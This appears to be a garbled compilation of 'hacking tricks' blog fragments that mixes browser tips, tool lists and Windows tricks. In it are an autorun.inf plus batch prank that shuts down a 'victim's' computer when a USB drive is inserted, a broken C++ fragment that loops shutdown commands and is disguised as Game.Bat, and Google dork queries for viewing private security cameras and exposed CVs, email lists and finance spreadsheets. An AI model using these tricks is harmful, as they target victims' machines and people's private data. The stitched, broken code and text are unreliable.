Beruflich Dokumente
Kultur Dokumente
ies>command prompt.
Open the infected drive such as write , g: to go to G drive.
Now type dir/w/a . It will show all the files of the drive including hidden
files.
Locate AUTORUN.INF or any Virus and other suspicious files in the directory.
there was no virus in my drive so only autorun.inf is been highlighted.
Type command attrib -r a s h to remove attributes of corresponding file.
Type del autorun.inf to delete autorun.inf file.
Now type del virus name.exe t delete it, eg : del newfolder.exe .
(You can also delete viruses by using following steps:
When you find an Autorun.inf file or any other unusual .exe file just rename
it.
Syntax for rename is (rename filename.extension new name , for example: (rename
autorun.inf virus) to rename autorun.inf file. Here I have renamed it by virus.
Now you can access the defected drive without affecting the virus.
To delete the renamed file go to the defected drive and select the file you
renamed.
shutdown -s -t 00
Save as besthacking.bat extension (for eg: besthacking.bat).
Step 2:
Now open the notepad and copy this code:
[autorun]
Open=besthacking.bat
Action=Mouse Disable
Save it as "autorun.inf"
Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned of
f automatically.
Check How to Disable This:First Stop Autorun in Your Computer And Then Format Pendrive..
And If You Stop Autorun Check My Older Post
-------------------------------------------------------------------------------------------------------------------------------------------------------Whenever you connect a removable media to your computer, the autorun feature of
Windows 7 comes into action and immediately provides you with many options inclu
ding the Open folder to view files option. Apart from the internet, most viruses a
nd malware enter the system through infected removable media. Malicious programs
malware and viruses usually infects the Autorun.inf file present on the removab
le media device. If you happen to connect an infected removable media device lik
e USB to your computer and then make use of the Open folder to view files option,
the malware will get activated and thereby attack all the files of your system.
The only way to deal with this problem is to disable the Autorun feature of Wind
ows.
Here are the steps on how to disable Autorun in Windows 7:
Step 1. Press Windows key + R to launch the Run dialogue box. Here you need to e
nter Gpedit.msc and then click on OK.
Step 2. You will now see the Local Group Policy Editor on your screen.
Step 3. On the Local Group Policy Editor, you need to click on Computer Configur
ation > Administrative Templates> Windows Components. Under Windows Components,
you will see AutoPlay Policies.
Step 4. When you click on AutoPlay Policies on the left, you will also see an op
tion that says Turn off AutoPlay on the right. Click on it and then choose the E
dit option.
Step 5. On the Turn off AutoPlay window, you need to select the Enabled option
Step 6. Click on the Apply and OK buttons and to finish the disable Autorun feat
ure on Windows 7.
Also make sure you select the All drives option as shown on the screenshot of st
ep no.5 in order to disable the Autorun feature on all drives.
-------------------------------------------------------------------------------------------
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;
3-Save It As Game.Bat
4-finish
------------------------------------------------------------------------------------------------------firefox fast:
1.Enable pipelining
To enable it:
Type about:config in the address bar > double-click network.http.pipelining and
network.http.proxy.pipelining so their values are set to true >
double-click network.http.pipelining.maxrequests > set this to 8.
-------------------------------------------------chrome fast:
1.Browse in Incognito Mode
Browsing in Incognito Mode will ensure your browsing history or cookies won t be
stored on your computer so that others using
the same computer will have no clue what you did online.
To enable: Go to file menu > select New Incognito Window
2.Create Customised Search Engines
Most websites have downright terrible search engines. Fortunately Chrome has a w
ay out.
To enable: Right click in the search bar > Select Add As Search Engine > Provi
de your custom search engine when prompted
3.Get more Omnibox suggestions
Entering a search term into Chrome s Omnibox URL bar, it creates a pull-down lis
t of a maximum of five suggestions for
matching sites. To increase the number:
Right-click on the Chrome icon > Select Properties > Find the Target text box
> Add a space at the end of the line and
omnibox-popup-count=30
4.Pinning Tabs
Having a bunch of tabs opened in your Chrome window is a normal sight while brow
ing, however, there s a way to pin down apps so you don t miss out on the one s
that are important. All you need to do is right click on any one of the tab you
re looking to pin down and choose Pin Tab. The tab will move all the way to th
e left. Further, the pinned tab won t have the x option so you don t accidentl
y end up closing it.
5.Hover Zoom
The extension called Hover Zoom lets you see the full-size (or nearly) full-size
d image of a thumbnail without actually having to navigate to the page and waiti
ng for it to load.
6.Get Short Synopses of Long Articles
The Chrome extension Too Long Didnt Read It produces a synopsis of an article p
iece you want to read but don t want to at the word go since it s too long.
7.Turn Off the Lights
The Turn Off the Lights extension fades everyone else in your browser window t
o black while youre viewing a video. Particularly useful when videos are of of po
or quality and don t look good full screen.
8.Remove just your recent surfing history
The Google Chrome Backup (GCB) tool lets you create a backup of your browser s p
rofile and restore it again later. This will roll back Chrome s search history t
o the point at which you backed it up.
------------------------------------------------------------------------------1. Keyframer
This is a handy CSS tool that allows you to create animations in CSS very easily
.
2. Spin Kit
SpinKit uses CSS animations to create smooth and easily customizable animations.
The goal is not to offer a solution that works in every browserif you re support
ing browsers that haven t implemented the CSS animation property (e.g. IE9 and b
elow), you ll want to detect support for the animation property, and implement a
fallback.
3. Wow.js
This is a plugin that allows you to reveal animations when the user scrolls down
on the web page.
4. Magic CSS3 Animation
This is a package of animations for CSS3 that can be used freely in your project
s.
5. Animo.js
This tool allows you to stack animations, create cross-browser blurring, set cal
lbacks on animation completion etc.
6. CSS3 Animation Cheat Sheet
The CSS3 Animation Cheat Sheet is a set of preset, plug-and-play animations for
your web projects. All you need to do is add the stylesheet to your website and
apply the premade CSS classes to the elements you want animated.
7. Tridiv
This is a web-based editor that allows you to create 3D shapes in CSS on your in
ternet browser.
8. Sencha Animator
Sencha Animator is a desktop app to create CSS3 animations for WebKit browsers a
nd touchscreen mobile devices. Create rich experiences for todays most popular de
vices.
9. Magic
This is a stylesheet that comes with a number of CSS effects.
10. Textillate.js
Textillate.js combines some awesome libraries to provide a ease-to-use plugin fo
1.fdisk
-Display the partitions and details like file system type.
-Does not report the size of each partition.
2.sfdisk
-Similar to fdisk, however, it can display the size of each partition in MB.
3.cfdisk
-List out the existing partitions. Can also create or modify them.
-Boasts of an interactive user interface that is based on ncurses.
4.parted
-Lists out partitions and modifies them when needed.
5.df
-Prints out details about only mounted file systems, even file systems that ar
e not real disk partitions.
-Note: not a partitioning utility, per say.
6.pydf
-Improvised version of df that prints out all the hard disk partitions in an eas
y to read mannner.
-Shows
7.blkid
-Prints the block device (partitions/storage media) attributes such as uuid and
file system type.
-Doesn t report the space on the partitions.
8.hwinfo
-General purpose hardware information tool that can also print out the disk and
partition list.
-However, you won t get the print details about each and every partition
------------------------------------------------------------------------------------------------------------------------------------------------------1. Google Ngram Viewer
Want to search keywords in over 500,000 books? The Google Ngram Viewer is what y
ou need. It is useful especially when you can t remember a book, but remember ex
cerpts from it.
2. Google Correlate
We all use Google Search, but in order to start a business, especially an online
enterprise, one needs to know what others are searching for. Google Correlate a
llows you to view search trends over time. It is part of Google Trends.
3. Google Trends
As is evident from the name, this one allows you to find search trends on Google
. You can find out popular searches etc.
4. Google Think Insights
This one is very useful if you re starting a business. It brings you case studie
s and many other pieces of useful information that can help you with your enterp
rise.
5. Google Public Data Explorer
This tool allows you to search through public databases from around the world an
d find information that you need. There are also graphs to help you with the sea
rches.
6. Full Value of Mobile
While a mobile site is more or less essential for almost every enterprise nowada
ys, this tool from Google tells you just how important it is. It is a calculator
that tells you how much your audience uses mobiles for your website and how imp
ortant a mobile site is.
7. Get Your Business Online
This one helps local small businesses in America to bring their trade online and
optimise their profits.
8. Webmaster Tools
As the name suggests, this is a tool for webmasters, who can use it to monitor t
heir website s traffic and health.
9. Schemer
This is a tool that plans your to-do list for a particular area that you are in.
It is useful for people travelling to new places.
10. Google Fonts
This is a variety of open source web fonts that can be used by anyone for privat
e or commercial use.
11. Google Developers
This is actually one of the more known services from Google. It is a developer s
heaven.
12. Dart
While it hasn t done so yet, Dart is a programming language that was meant to re
place JavaScript in order to build web apps. It was developed by Google.
13. Google Keep
This is an app that connects your Google Drive to all your devices and helps man
age various items.
14. Google Sky
Along with Google Earth and Google Moon, this is part of Google s space initiati
ves. It is a part of Google Earth and lets you explore space while sitting at ho
me.
It has been developed in collaboration with NASA and the images come from the H
ubble Telescope.
-------------------------------------------------------------------------------------------------------------------------Here we have compiled 12 of the best Firefox add-ons of 2014:
1. Collusion
-Lets you view which of the sites are using third-party cookies to track your mo
vements across the Web.
-Get real time info on how data creates a spider web of interaction between comp
anies and other trackers.
2. URL Fixer
-Intelligently corrects typos, if any, in URLs that you enter in the address bar
.
3. PearlTrees
-A unique visual and social library that lets you collect, organise and share ev
erything you like.
4. TwitBin
-Send your Twitter messages, receive Tweets, share links and more courtesy this
add-on.
5. Memonic Web Clipper
-Save the essential content snippets on any page and use them on any computer or
mobile, share and discuss as and when you like.
6. 365scores Notifier
-All you sports fanatics out there, this is a one stop shop that lets you get al
l the scores, updates and other information about your favorite teams in real ti
me.
7. Do Not Track Plus
-Tell Websites not to track your online activity with this add-on.
8. Cheevos for Firefox
-This add-on makes using the web even more fun by giving you achievements for us
ing Firefox.
9. Tab Badge
-Get alerts on any one of your open tabs and know when theres something new on th
at page.
10. Fabtabs
-Adds colours to tabs by taking screenshots of the website and effectively calcu
lating the most commonly used color from that screenshot.
11. All-in-One Sidebar
-Open various windows as sidebar panels, and quickly switch between them.
12. LastPass Password Manager
-Manages passwords for sites you visit to make browsing easier and more secure w
ith this add-on.
________________________________________________________________________________
________________________________________________________________________________
______
1.Brutus
Brutus is one of the fastest, most flexible remote password crackers you can get
your hands on - it s also free. It is available for Windows 9x, NT and 2000,
there is no UNIX version available although it is a possibility at some point i
n the future.
Brutus was first made publicly available in October 1998 and since that time the
re have been at least 70,000 downloads and over 175,000 visitors to this page.
2.Wfuzz
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for f
inding resources not linked (directories, servlets, scripts, etc),
bruteforce GET and POST parameters for checking different kind of injections (SQ
L, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.
3.RainbowCrack
RainbowCrack is a general propose implementation of Philippe Oechslin s faster t
ime-memory trade-off technique. It crack hashes with rainbow tables.
RainbowCrack uses time-memory tradeoff algorithm to crack hashes. It differs fr
om brute force hash crackers.
4.SolarWinds
Transform the complexity of IT security and compliance management with SolarWind
s Log & Event Manager (LEM) powerful, easy-to-use Security Information & Event M
anagement (SIEM) in an affordable, all-in-one virtual appliance.
5.L0phtCrack
L0phtCrack 6 is packed with powerful features such as scheduling, hash extractio
n from 64 bit Windows versions, multiprocessor algorithms,
and networks monitoring and decoding.
Yet it is still the easiest to use password auditing and recovery software avai
lable. Software runs On Windows XP and higher. Operates on networks with Windows
NT, 2000, XP, Server 2003 R1/R2, Server 2008 R1/R2, on 32- and 64-bit environme
nts, as well as most BSD and Linux variants with an SSH daemon.
6.Medusa
Medusa is intended to be a speedy, massively parallel, modular, login brute-forc
er.
The goal is to support as many services which allow remote authentication as pos
sible.
7.Ophcrack
Ophcrack is a free Windows password cracker based on rainbow tables. It is a ver
y efficient implementation of rainbow tables done by the inventors of the method
. It comes with a Graphical User Interface and runs on multiple platforms.
8.THC-Hydra
A very fast network logon cracker which support many different services.
9.John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors
of Unix, Windows, DOS, BeOS, and OpenVMS.
Its primary purpose is to detect weak Unix passwords. Besides several crypt(3)
password hash types most commonly found on various Unix systems,
supported out of the box are Windows LM hashes, plus lots of other hashes and ci
phers in the community-enhanced version.
10.Aircrack
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover
keys once enough data packets have been captured.
It implements the standard FMS attack along with some optimisations like KoreK a
ttacks, as well as the PTW attack,
thus making the attack much faster compared to other WEP cracking tools.
________________________________________________________________________________
________________________________________________________________________________
_____
1. GTK+
Also known as the GIMP toolkit, this is a multi-platform toolkit that is used fo
r creating graphical user interfaces. It has been written in the C programming l
anguage but supports a wide variety of languages, including Perl and Python.
2. LessTif
This was the Hungry Programmer s version of the OSF/Motif computer programming t
oolkit. It is distributed under the GNU Public License, which makes it loyalty f
ree, unlike Motif, which was distributed under a proprietary license.
3. ActiveState Perl Dev Kit
This is an essential programming toolkit for those working with Perl. It include
s versions of PerlApp, Coverage Analyzer and Filter Builder for Windows, Mac OS
X, Linux, HP-UX and Solaris. PerlApp and Filter Builder are also available for A
IX.
4. ActiveState Tcl Dev Kit
As the name suggests, the Tcl Dev Kit (TDK) provides essential tools for Tcl pro
grammers, making it easy to create, build and deploy applications. It allows dev
elopers too rapidly create applications using the Tcl language.
5. Aesop
This tool brings you a variety of features that are useful for programmers. The
features include,
- A toolkit for rapidly building software architecture design environments speci
alised for domain specific architectural styles.
- An open tool integration framework that supports cooperation between Aesop and
your favorite tools.
- A "Style-aware" repository for storing, retrieving, and reusing architectural
design elements.
- A persistent object-oriented database for storing and manipulating architectur
al designs.
- A customisable Tcl/Tk based graphical user interface.
6. Amulet
This is a user interface development environment for the C++ programming languag
e and it is portable across X11 on all kinds of Unix, Windows 95 and NT and the
Mac.
Amulet helps you create graphical, interactive user interfaces for your softwar
e.
7. Andrew
This graphical user interface comes with some of the much sought after requireme
nts. These include,
- word processor
HTML editor
Program editor
Drawing editor
Directory browser
Help browser
Spreadsheet
Mail/Bulletin board manager
Application builder
Scripting language
8. Arabica
This toolkit has been written using the C++ programming language. It is an XML a
nd HTML processing toolkit that brings support for SAX, DOM, XPath, and XSLT imp
lementations.
9. AVR Cross Development Kit
CDK4AVR is an abbreviation for Cross Development Kit for Atmels AVR RISC process
or series.
It supports with a comprehensive Assembler and C development environment for th
is processor family under the Linux or similar host systems
----------------------------------------------------------------------------------------------------------------------------
1.HelloSign
Cloud-based electronic signature tool that enables users to sign, fill out, send
, retrieve, and save documents paperlessly. Users may also upload and prepare do
cuments to be signed and filled out by another party or parties, otherwise known
as a signature request.
2.Boomerang for Gmail
Boomerang for Gmail lets you take control of when you send and receive email mes
sages in Chrome/Firefox/Safari.
3.Copy2Contact
Copy2Contact instantly grabs new leads, contacts and events into Gmail Contacts
and Calendar. It works with any contact or appointment info on your screen, like
an email message, web search results, document, resume, and more.
4.Minimalist for Everything
Used for: centralised script and style management, core modules that customise w
eb experience and easily developing and deploying custom styles and scripts.
5.AwayFind
There are important people and important topics in life that you can t miss. Get
alerted to just these emails and save your attention for what matters with this
tool.
6.ToutApp
Tout streamlines your email workflow with templates, tracking, and scheduling. I
t automatically filters your Inbox based on the groups of people that are import
ant to you.
7.ActiveInbox
ActiveInbox is for people who want a lightweight solution to effectively manage
their email, or even use Gmail as their main task manager.
8.Rapportive
Rapportive shows you everything about your contacts right inside your inbox.
9.TrueNew
Originally developed for the Mailroom iPhone application for Gmail, it turns unr
ead counts on their head by not worrying so much about what is unread, but on wh
at is new.
10.Boomerang
Allows you to schedule messages to be sent or returned at a later date. Write a
message now, send it whenever, even if you re not online
________________________________________________________________________________
_____________________________________________________________________________
1. Flat UI
This UI kit is very useful when you re starting off with a website. It contains
a variety of elements like sliders, progress bars, checkboxes etc. that would co
me in handy.
2. Dribble
This is a flat UI kit that includes a special PSD that had been designed specifi
cally for blogs.
3. UI Kit (Free PSD)
This is a pretty well balanced UI kit that allows you to gain quite some control
over your design and make nice designs.
4. Minimize UI Kit
This one can be downloaded in a single PSD and allows you to resize the elements
as you need.
5. Flat/Skeuomorphic UI Kit
This UI kit can be downloaded for free and allows both flat and skeumorphic user
interfaces. It is used for both commercial and personal projects.
------------------------------------------------------------------------------------------------------------------------------------------Communication and File Sharing: Security during communication and file sharing o
ver networks is of the utmost importance nowadays. Security applications nowaday
s use top of the line encryption techniques in order to protect your data from a
ttackers. Some of these apps even provide military grade encryption on your data
.
1. Mute
2. Waste
3. ANts P2P
Data Removal: Your computer keeps a record of the data that you remove from it,
which is why deleted data can often be retrieved. If you want to ensure that the
data can never be brought back then these apps will come in handy.
4. Eraser
5. Darik s Boot and Nuke
6. Wipe
7. AxCrypt
8. Mac GNU Privacy Guard
9. WinPT
10. PeaZip
11. MCrypt
12. Keyring for PalmOS
13. Hide in Picture
14. Steghide
15. GPGrelay
16. MailCrypt
17. Open Signature
18. Crypt
File Transfer: This app offers a basic file manager and can handle both SFTP and
FTP file transfers. Attackers often try to steal data when files are being tran
sferred between users. Apps like WinSCP help ensure that your data is protected.
19. WinSCP
Firewalls/Network Gateways: One of the favourite ways for any attackers to steal
data is by attacking entire networks. This gives them access to number of syste
ms and hence a bigger amount of data. The following security apps provide variou
s kinds and levels of security for your network.
20. IPCop
21. ShellTer
22. Endian Firewall Community
23. Untangle
24. Devil-Linux
25. Turtle Firewall
26. Shorewall
27. FireHOL
28. Sentry Firewall
29. Vuurmuur
Forensics: While computer forensics sounds like a task that would come in handy
for policework alone, this isn t true. System administrators need to ensure that
users aren t performing malicious activities or doing anything that might put t
he system at risk. Forensics apps allow admins to trace deleted data, track last
activity etc.
30. ODESSA
31. Live View
Internet Security Suites: The internet is the most common source for malware. Mo
st people don t even realise when their systems have been affected.
32. Winpooch
33. DemocraKey
Intrusion Detection: Intrusion detection is one of the key tasks for a system ad
ministrator. Attackers can get in and out of your system without even giving you
a hint of what has happened. That is why security apps that detect intruders ar
e so important.
34. Snort
35. AFICK (Another File Integrity Checker)
36. snort_inline
Log File Analyzers: Firewalls and other security apps have log files that tell y
ou about what they have been doing. These log files, though important, can not b
e read and understood by everyone. That is where log file analysers come in. The
y tell you what information the log files are giving you.
37. AWStats
38. IPtables Log Analyzer
Network Monitoring: These applications monitor your network and provide valuable
information on the various IP addresses etc.
39. Angry IP Scanner
40. Winfingerprint
-----------------------------------------------------------------------------------------------------------------------1.Browse in Incognito Mode
Browsing in Incognito Mode will ensure your browsing history or cookies won t be
stored on your computer so that others using
the same computer will have no clue what you did online.
To enable: Go to file menu > select New Incognito Window
2.Create Customised Search Engines
Most websites have downright terrible search engines. Fortunately Chrome has a w
ay out.
To enable: Right click in the search bar > Select Add As Search Engine > Provi
de your custom search engine when prompted
3.Get more Omnibox suggestions
Entering a search term into Chrome s Omnibox URL bar, it creates a pull-down lis
t of a maximum of five suggestions for
matching sites. To increase the number:
Right-click on the Chrome icon > Select Properties > Find the Target text box
> Add a space at the end of the line and
omnibox-popup-count=30
4.Pinning Tabs
Having a bunch of tabs opened in your Chrome window is a normal sight while brow
ing, however, there s a way to pin down apps so you don t miss out on the one s
that are important. All you need to do is right click on any one of the tab you
re looking to pin down and choose Pin Tab. The tab will move all the way to th
e left. Further, the pinned tab won t have the x option so you don t accidentl
y end up closing it.
5.Hover Zoom
The extension called Hover Zoom lets you see the full-size (or nearly) full-size
d image of a thumbnail without actually having to navigate to the page and waiti
ng for it to load.
6.Get Short Synopses of Long Articles
The Chrome extension Too Long Didnt Read It produces a synopsis of an article p
iece you want to read but don t want to at the word go since it s too long.
7.Turn Off the Lights
The Turn Off the Lights extension fades everyone else in your browser window t
o black while youre viewing a video. Particularly useful when videos are of of po
or quality and don t look good full screen.
8.Remove just your recent surfing history
The Google Chrome Backup (GCB) tool lets you create a backup of your browser s p
rofile and restore it again later. This will roll back Chrome s search history t
o the point at which you backed it up
------------------------------------------------------------------------------------------------------------------------1. Hack This Site!
-Provides realistic challenges which allow you to practice your cracking skills
in a safe, legal environment.
2. Hack-tech
-Cover hacking, infosec and network security.
-Topics like firewalls, encryption and malicious software are also available.
3. Hack Hound
-Learn about programming, malware analysis, windows security and server security
.
4. Binary Revolution Forums
-Offers gallery, blog, download on hacking resources.
5. Exploits Database by Offensive Security
-Learn about exploits, Shellcode, vulnerability reports, 0days, remote exploits,
local exploits, security articles, tutorials and more.
6. Blackhat Forums - Underground Hacking and Security Community
-Claims to be the best IT Security/Hacking community on the Internet.
7. InterN0T - Underground Security Training
-Free Community on hacking, exploiting, security, pentesting, programming Langua
ges etc.
8. Crackmes.de
-Claims to be the most complete Crackmes web page on the internet.
9. h4cky0u.org
-Cover every possible aspect of hacking and network, information security.
10. Darknet
-Learn about eEthical hacking, penetration testing and computer security.
11. CrackingForum
-Latest cracking programs and crack tutorials are available here.
12. r00tsecurity
-Topics like hacking, infosec and network security are discussed in detail.
-A huge collection of tutorials, articles, books, guides and tools make it a wor
thy try.
13. The Ethical Hacker Network
-Free online magazine for the security professional.
14. CyberTerrorists
-Discussions on latest exploits, scripts, latest softwares, music , movies , and
other neccesary things.
15. LeetCoders
7. Now Minimize vlc player and you will see your video running on your deskto
p as wallpaper.
8. If you want your default wallpaper back then uncheck DirectX Wallpaper fro
m video dropdown list.
9. Hope you like this simple trick share your thought about this trick in com
ment section.
------------------------------------------------------------------------------------------------------------------------------------------------------
4. Now open cmd by going to Start > Accessories > Command Prompt and type follow
ing commands in it.
cd desktop
hide files behind images
5. CD stands for change directory by typing above command you change your direct
ory to desktop. After that type command given below.
Copy /b imagename.jpg + filename.rar finalimage.jpg
hide files behind images
Replace imagename.jpg with the name of image you want your file to be hidden
behind. Don t forget to add image format (Eg: .jpg,.png,.gif)
Replace filename with name of your file you want to hide. It must be in .rar
format.
Finally Replace finalimage.jpg with whatever name you want your final image
with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal
image, but to open you hidden file you need follow steps given below.
How To Access Hidden File ?
To access your hidden file you need to open the newly created image in winrar. J
ust follow simple steps given below to do that.
1. Open winrar
2. Now locate your image and open it or simply drag your image in winrar.
3. Extract the file and done.
-------------------------------------------------------------------------------------------------------------------------------------------------------How To Lock Folder ?
1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
1.Ad-Aware
Anti-spyware and anti-virus program developed by Lavasoft that detects and remov
es malware, spyware and adware on a user s computer.
2.Emsisoft Emergency Kit
The Emsisoft Emergency Kit contains a collection of programs that can be used wi
thout software installation to scan for malware and clean infected computers.
3.Norman Malware Cleaner
This simple and user friendly tool not only detects malicious software but also
removes them from your computer.
By downloading and running the program it will clean an infected system complete
ly.
4.SUPERAntiSpyware
Shareware which can detect and remove spyware, adware, trojan horses, rogue secu
rity software, computer worms, rootkits,
parasites and other potentially harmful software applications. Although it can d
etect malware, SUPERAntiSpyware is not designed to replace antivirus software.
5.Spybot
Spybot Search & Destroy is a set of tools for finding and removing malicious sof
tware. The immunisation feature preemptively protects the browser against threat
s.
System scans and file scans detect spyware and other malicious software and era
dicates it.
6.Combofix
Executable software, intended for users with advanced computer skills to run it
only on occasions where a regular antivirus would not detect certain malware,
or where an antivirus cannot update or otherwise function.
7.Microsoft Security Scanner
Free downloadable security tool that provides on-demand scanning and helps remov
e viruses, spyware, and other malicious software.
It works with your existing antivirus software.
8.Malwarebytes Anti-Malware
Made by Malwarebytes Corporation, it was first released in January 2008 and is a
vailable in a free version,
which scans for and removes malware when started manually.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability Scanners
1.SAINT
2.Nipper
3.Secunia PSI
4.Retina
5.MBSA
6.QualysGuard
7.GFI LanGuard
8.Nexpose
9.Core Impact
10.OpenVAS
11.Nessus
Password Cracker
12.Brutus
13.Wfuzz
14.RainbowCrack
15.SolarWinds
16.L0phtCrack
17.Medusa
18.PwDump 6
19.AirSnort
20.THC Hydra
21.John the Ripper
22.Cain and Abel
23.Aircrack
24.Ophcrack
Anonymous Tools
25.Hotspot Shield: Hotspot Shield free VPN for Windows secures your web browsi
ng session,
protects your online identity from snoopers, encrypts passwords, online shoppin
g information,
chats, and downloads. Moreover, Hotspot Shield VPN protects your IP address fro
m snoopers, hackers, and ISPs to allow anonymous web surfing with complete priva
cy
26.AIO Secret Maker
Game Hacking Tools
27.Art Money
28.3D Fx Zone
29.Game Booster
30.Speed Gear
31.Cheat Engine: Cheat Engine is an open source tool designed to help you with
modifying single player games running under windows so you can make them harder
or
easier depending on your preference(e.g: Find that 100hp is too easy, try playin
g a game with a max of 1 HP),
but also contains other useful tools to help debugging games and even normal app
lications.
Remote password Stealer::::::
________________________________________________________________________________
___________________________________________________
So, here are 20 major Linux applications that are part of almost every Linux us
ers PC.
Linux, open source, open source application programs, open source list, Linux pr
ograms, Linux apps, best Linux apps,
most popular Linux apps, Apache, Blender, The GIMP, open source news
1. AbiWord
2. Apache
3. Blender
4. Dia
5. DOSEMU
6. Evolution
7. Firefox
8. gedit
9. gFTP
10. Ghostscript
11. The GIMP
12. GNOME
13. Gnumeric
14. GQview
15. Kaffeine
16. KDE
17. KHexEdit
18. Konqueror
19. LyX
20. RCalc
________________________________________________________________________________
_______________________________________________________________________________
Here s a list of six best hacking sites to get you started:
1. HellBound Hackers
-Covers an expansive range of topics including ethics, social engineering and ph
reaking.
-Has a community of almost 50,000 members.
2. Hack This Site
-Provides realistic challenges which allow you to practice your cracking skills
in a safe, legal environment.
-Interactive hacking tutorials, with the associated articles and guidance is a t
reat for potential hackers.
3. Ethical Hacker Network
-Features articles and interviews with key figures in cyber security.
-Provides information on certifications.
4. 2600
-First published in 1984, the 2600 magazine has been the inspiration for several
generations of ethical hackers.
5. Hacker Games
-Offers a range of challenges for budding hackers.
-Provides a great, safe avenue for investigating complex security setups.
6. SlaveHack
-This free hacking simulator pits you against thousands of competitors all looki
ng to get one over on you.
________________________________________________________________________________
________________________________________________________________________________
_________
hacking:::::
1. Astalavista
2. Packet Strorm
3. Black Hat
4. Metaspoilt
5. SecTools.org
6. 2600
7. DEF CON: Hacking conference
8. Break The Security
9. Hacking-Tutorial
10. Evilzone
11. HAck A Day
12. Hackthissite.org
13. PenTest Magazine
14. SecurityTube
15. Quallys SSL Labs
________________________________________________________________________________
__________
1.Hacking Security Cameras!
You might have noticed many security cameras monitoring places like parking lots
, college campus, road traffic etc (and yes, some of them work!). Did you know y
ou can use Google to hack into these cameras to view images captured by these ca
meras in real time. How do you do it? Well simply open the Google search box and
type in the following query:
inurl:viewerframe?mode=motion
You will get a search result that will give you access to live cameras with full
controls (move the camera in all the four directions, perform zoom in and zoom
out). The above mentioned query usually gives access to cameras with less refres
h rate. In case you re looking for faster refresh rates:
intitle:Live View / AXIS
2.Hacking Personal and Confidential Documents!
You can access an email repository containing personal and confidential document
s (CVs for instance) using Google. Simply open the Google search box and type in
the following query:
intitle:curriculum vitae phone * * * address * e-mail
To access a list of excel documents which contains contact details including ema
il addresses of people:
filetype:xls inurl:email.xls
To access documents potentially containing information on bank accounts, financi
al summaries and credit card numbers:
intitle:index.of finances.xls
1.Scribus
Scribus is an Open Source program that brings professional page layout to Linux,
BSD UNIX, Solaris, OpenIndiana, GNU/Hurd, Mac OS X, OS/2 Warp 4, eComStation,
and Windows desktops with a combination of press-ready output and new approaches
to page design. Underneath a modern and user-friendly interface, Scribus suppor
ts
professional publishing features, such as color separations, CMYK and spot color
s, ICC color management, and versatile PDF creation.
2.VIPS
VIPS is a free image processing system. It is good with large images (images lar
ger than the amount of RAM you have available), with many CPUs,
for working with colour, for scientific analysis and for general research and de
velopment. As well as JPEG, TIFF and PNG images, it also supports scientific
formats like FITS, Matlab, Analyse, PFM, Radiance and OpenSlide. Compared to mos
t image processing libraries, VIPS needs little memory and runs quickly,
especially on machines with more than one CPU.
3.Album Shaper
Album Shaper strives to be the most friendly, easy to use, open source applicati
on for organising, annotating, framing, enhancing, stylising, and
sharing your digital photos. Album Shaper embraces open formats like XML, JPEG,
and XSLT, while supporting Windows, Mac OS X, and Unix users who speak a multitu
de
of languages around the world.
4.TundraDraw
TundraDraw is a cross-platform ANSI drawing program written with C++, using the
Qt Toolkit.
Thus, it runs natively on both X environments and Windows. It features network
connectivity to allow artists to draw together over the Internet.
5.WebPic
WebPic is an application used to take a directory of digital cam pictures and pr
ovide a front end for web viewing.
It allows you to scale the images to different values, add comments for the pict
ures, and display them in varying html styles.
It uses ImageMagick for the image processing and PerlMagick as the interface.
6.Xpdf
Xpdf is an open source viewer for Portable Document Format (PDF) files. (These a
re also sometimes also called Acrobat files, from the name of Adobe s PDF soft
ware.) The Xpdf project also includes a PDF text extractor, PDF-to-PostScript co
nverter, and various other utilities. Xpdf runs under the X Window System on UNI
X, VMS, and OS/2. The non-X components (pdftops, pdftotext, etc.) also run on Wi
n32 systems and should run on pretty much any system with a decent C++ compiler.
7.SIP
SIP stands for Scilab Image Processing toolbox. SIP intends to do imaging tasks
such as filtering, blurring, edge detection, thresholding, histogram manipulatio
n,
segmentation, mathematical morphology, color image processing, etc.
8.White_dune
White_dune is a low level X3D/VRML97 tool for Unix/Linux/MacOSX and M$Windows.
It can read VRML97 and X3D files, display and lets the user change the scenegrap
h and fields.
Unlike most high-level tools, it s 3D preview is based on the lighting model of
the VRML97/X3D standards.
9.Gmsh
Gmsh is a 3D finite element grid generator with a build-in CAD engine and post-p
rocessor.
Its design goal is to provide a fast, light and user-friendly meshing tool with
parametric input and advanced visualisation capabilities.
Gmsh is built around four modules: geometry, mesh, solver and post-processing.
The specification of any input to these modules is done either interactively usi
ng the graphical user interface or in ASCII text files using Gmsh s own scriptin
g language.
10.JPatch
JPatch is a spline based 3D modeling tool (a patch modeler). It can be used to c
reate 3D models for POV-Ray or RenderMan compatible renderers (e.g. Aqsis).
It is free software; you can redistribute it and/or modify it under the terms o
f the GNU General Public License.
________________________________________________________________________________
________________________________________________________________________________
_____________________
